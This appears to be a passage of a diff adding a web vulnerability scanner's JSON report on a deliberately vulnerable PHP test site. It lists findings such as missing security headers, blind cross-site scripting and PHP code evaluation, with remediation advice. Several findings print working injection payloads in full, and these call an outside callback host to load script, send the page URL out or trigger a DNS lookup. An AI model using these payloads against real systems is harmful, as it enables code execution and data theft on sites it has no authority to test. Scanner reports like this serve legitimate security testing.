AM", + "Name": "Out-of-date Version (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of PHP to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "PhpOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "103", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "693", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Acunetix360 detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

    \n

    The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4f5de955-5e9d-4746-3fc0-ad490209f0e6", + "Impact": "
    \n

    Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is \"hijacking\" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

    \n

    Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-Frame-Options Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n
      \n
    • Sending the proper X-Frame-Options in HTTP response headers that instruct the browser to not allow framing from other domains.\n
        \n
      • X-Frame-Options: DENY  It completely denies to be loaded in frame/iframe.
      • \n
      • X-Frame-Options: SAMEORIGIN It allows only if the site which wants to load has a same origin.
      • \n
      • X-Frame-Options: ALLOW-FROM URL It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.
      • \n
      \n
    • \n
    • Employing defensive code in the UI to ensure that the current frame is the most top level window.
    • \n
    \n
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXFrameOptionsHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "164.308(a)", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    Acunetix360 detected a missing X-XSS-Protection header which means that this website could be at risk of a Cross-site Scripting (XSS) attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 05:45 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "f4fdd62e-a869-499f-b70d-ad48032ad260", + "Impact": "
    This issue is reported as additional information only. There is no direct impact arising from this issue.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-XSS-Protection Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Add the X-XSS-Protection header with a value of \"1; mode= block\".\n
      \n
    • \n
      X-XSS-Protection: 1; mode=block
      \n
    • \n
    \n
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXssProtectionHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": null, + "Cvss31": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Cookies are typically sent to third parties in cross origin requests. This can be abused to do CSRF attacks. Recently a new cookie attribute named SameSite was proposed to disable third-party usage for some cookies, to prevent CSRF attacks.

    \n

    Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nAcunetix Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      Acunetix xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "68368f54-b163-41d0-430c-ad49020a4d6b", + "Impact": "", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "SameSite Cookie Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "

    The server can set a same-site cookie by adding the SameSite=... attribute to the Set-Cookie header. There are three possible values for the SameSite attribute:

    \n
      \n
    • Lax: In this mode, the cookie will only be sent with a top-level get request.\n
      Set-Cookie: key=value; SameSite=Lax
      \n
    • \n
    • Strict: In this mode, the cookie will not be sent with any cross-site usage even if the user follows a link to another website.\n
      Set-Cookie: key=value; SameSite=Strict
      \n
    • \n
    • None: In this mode, the cookie will be sent with the cross-site requests. Cookies with SameSite=None must also specify the Secure attribute to transfer them via a secure context. Setting a SameSite=None cookie without the Secure attribute will be rejected by the browsers.
      \n
      Set-Cookie: key=value; SameSite=None; Secure
      \n
    • \n
    \n

     

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "SameSiteCookieNotImplemented", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": true, + "Description": "

    Acunetix360 detected Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=%3ciMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2983\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:39 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "6f963587-2af9-4fac-7b41-ad490211f172", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n
      \n
    • Hijacking user's active session.
    • \n
    • Mounting phishing attacks.
    • \n
    • Intercepting data and performing man-in-the-middle attacks.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BlindXss", + "Url": "http://php.testsparker.com/artist.php?id=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3E" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "23", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "94", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified a Remote Code Evaluation (PHP) by capturing a DNS A request, which occurs when input data is run as code.

    \n

    This is a highly critical issue and should be addressed as soon as possible.

    ", + "ExploitationSkills": "
    This vulnerability is not difficult to leverage. PHP is a high level language for which there are vast resources available. Successful exploitation requires knowledge of the programming language, access to the source code or the ability to produce source code for use in such attacks, and minimal attack skills.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "name", + "Type": "Querystring", + "Value": "+gethostbyname(trim('pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc'.'6ii.r87.me'));//", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2770\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:50:36 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "c7139765-b9c1-494c-7b46-ad490211f1ab", + "Impact": "
    An attacker can execute arbitrary PHP code on the system. The attacker may also be able to execute arbitrary system commands.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Out of Band Code Evaluation (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Do not accept input from end users that will be directly interpreted as source code. If this is a business requirement, validate all the input on the application and remove all the data that could be directly interpreted as PHP source code.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "OutOfBandRcePhp", + "Url": "http://php.testsparker.com/hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.8" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:H/IR:H/AR:H" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.

    \n

    CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;

    \n
     Content-Security-Policy: script-src 'self';
    \n

    or in a meta tag;

    \n
    <meta http-equiv=\"Content-Security-Policy\" content=\"script-src 'self';\"> 
    \n

    In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:

    \n
      \n
    • script-src: Restricts the script loading resources to the ones you declared. By default, it disables inline script executions unless you permit to the evaluation functions and inline scripts by the unsafe-eval and unsafe-inline keywords.
    • \n
    • base-uri: Base element is used to resolve relative URL to absolute one. By using this CSP directive, you can define all possible URLs which could be assigned to base-href attribute of the document.
    • \n
    • frame-ancestors: It is very similar to X-Frame-Options HTTP header. It defines the URLs by which the page can be loaded in an iframe.
    • \n
    • frame-src / child-src: frame-src is the deprecated version of child-src. Both define the sources that can be loaded by iframe in the page. (Please note that frame-src was brought back in CSP 3)
    • \n
    • object-src : Defines the resources that can be loaded by embedding such as Flash files, Java Applets.
    • \n
    • img-src: As its name implies, it defines the resources where the images can be loaded from.
    • \n
    • connect-src: Defines the whitelisted targets for XMLHttpRequest and WebSocket objects.
    • \n
    • default-src: It is a fallback for the directives that mostly ends with -src suffix. When the directives below are not defined, the value set to default-src will be used instead:\n
        \n
      • child-src
      • \n
      • connect-src
      • \n
      • font-src
      • \n
      • img-src
      • \n
      • manifest-src
      • \n
      • media-src
      • \n
      • object-src
      • \n
      • script-src
      • \n
      • style-src
      • \n
      \n
    • \n
    \n

    When setting the CSP directives, you can also use some CSP keywords:

    \n
      \n
    • none: Denies loading resources from anywhere.
    • \n
    • self : Points to the document's URL (domain + port).
    • \n
    • unsafe-inline: Permits running inline scripts.
    • \n
    • unsafe-eval: Permits execution of evaluation functions such as eval().
    • \n
    \n

    In addition to CSP keywords, you can also use wildcard or only a scheme when defining whitelist URLs for the points. Wildcard can be used for subdomain and port portions of the URLs:

    \n
    Content-Security-Policy: script-src https://*.example.com;
    \n
    Content-Security-Policy: script-src https://example.com:*;
    \n
    Content-Security-Policy: script-src https:;
    \n

    It is also possible to set a CSP in Report-Only mode instead of forcing it immediately in the migration period. Thus you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:

    \n
    Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "e172ace9-3b52-43f6-3fca-ad490209f280", + "Impact": "

    There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out this extra layer of security.

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Content Security Policy (CSP) Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "
      \n
    • Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.
    • \n
    • Apply the whitelist and policies as strict as possible.
    • \n
    • Rescan your application to see if Acunetix360 identifies any weaknesses in your policies.
    • \n
    ", + "RemedialProcedure": "

    Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CspNotImplemented", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 70, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": false, + "Description": "

    Acunetix360 detected Possible Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, but was unable to confirm the vulnerability.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /products.php?pro=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "pro", + "Type": "Querystring", + "Value": "'\"-->", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2824\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:00 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "d442332c-e250-4c70-7b3c-ad490211f13b", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n
      \n
    • Hijacking user's active session.
    • \n
    • Mounting phishing attacks.
    • \n
    • Intercepting data and performing man-in-the-middle attacks.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "[Possible] Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

